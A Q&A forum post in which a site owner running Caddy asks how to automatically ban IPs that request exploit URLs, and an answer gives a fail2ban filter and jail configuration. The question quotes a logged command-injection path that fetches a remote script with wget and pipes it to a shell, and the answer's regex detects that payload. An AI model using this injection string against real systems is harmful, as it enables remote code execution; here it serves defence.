How to automatically block IPs that try exploit URLs?
I have a static website I serve with Caddy. The Caddy is inside a container.
I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are:
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://[ some ip ]/t+-O-+|+sh`)/backup/wp-admin/css/about.php
These are obviously hackers trying some common exploits to see if they'll get lucky and I want to block them automatically. For example, I could provide a list of string patterns and maybe any IP that requests a path that matches those will get an IP ban for a month.
I realize hackers can obtain fresh IPs in various ways. I still want to do the IP ban just to make their life harder.
How can I do this?
1 answer
If these requests are logged into a log file you can install fail2ban and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration of your choosing.
This would be a very basic (and untested) example:
You create a service definition /etc/fail2ban/filter.d/myservice.conf:
[Definition]
failregex = \$\(id>`wget\+http:\/\/\[.+\]\/t\+-O-\+\|\+sh`
You can test it with the command fail2ban-regex:
fail2ban-regex /var/log/myservice.log /etc/fail2ban/filter.d/myservice.conf
Then you create a jail that uses this service in /etc/fail2ban/jail.d/myservice.conf
# service name
[myservice]
# turn on /off
enabled = true
# ports to ban (numeric or text)
port = http,https
# filter from previous step
filter = myservice
# file to parse
logpath = /var/log/myservice.log
# ban rule:
# 5 times on 1 minute
maxretry = 5
findtime = 60
# ban on 10 minutes
bantime = 600
This assumes that your service is accessed via regular HTTP/HTTPS ports, those are getting blocked.
0 comment threads